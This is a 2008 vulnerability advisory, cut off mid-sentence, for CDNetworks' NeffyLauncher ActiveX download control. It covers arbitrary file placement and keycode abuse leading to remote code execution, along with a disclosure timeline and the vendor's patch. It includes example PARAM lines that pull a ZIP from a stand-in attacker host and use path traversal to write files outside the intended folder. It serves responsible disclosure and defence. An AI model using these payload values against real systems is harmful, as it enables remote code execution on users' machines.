1 Title: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
2 Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
3 Severity: High
4 Impact: Remote Code Execution
5 Vulnerable Systems: MS Windows Systems
6 Version: NeffyLauncher 1.0.5 {AA07EBD2−EBDD−4BD6−9F8F−114BD513492C}
7 Solution: Upgrade the vendor’s patch
8 Vendor’s Homepage: http://www.cdnetworks.com
9 Reference: How to stop an ActiveX control from running in Internet Explorer
10 http://support.microsoft.com/kb/240797/ko
11 http://support.microsoft.com/kb/240797/en−us
12 History:
13 − 02.27.2008: Initiate notify
14 − 03.06.2008: The vendor patched
15 − After: The vendor are applying the patch to their customers.
16
17 Description:
18 Neffycient Download is a ActiveX control used to download and to upgrade
19 such as game install files through HTTP, FTP, etc. It has two
20 vulnerabilities.
21 1st, a attacker can copy a malicious file to any path such as start program
22 folder(C:\Documents and Settings\All Users\Start Menu\Programs\Startup).
23 2nd, a attacker can issue keycodes which are used to restrict execution on
24 other domains.
25
26 Object:
27 I notify this vulnerability not to promote abnormal uses but to make
28 a software more secure. This vulnerability was patched by the vendor’s
29 positive effort. I hope this information helps many people who try
30 to study security and to develop an application.
31
32 1. Remote Code Execution
33 First of all, we must have write permission on a board in a web site used
34 this ActiveX or obtain a valid keycode which is correct to your site.
35 An Attacker who has a valid keycode can make a expolit by modifying
36 HttpSkin,
37 SkinPath’s values. Malicious files which is on attacker’s site must
38 be compressed as ZIP file.
39 For instance. The below modification copies abnormal files to Windows’s
40 root directory.
41 <PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
42 <PARAM NAME="SkinPath" VALUE="../../../../">
43
44 In this wa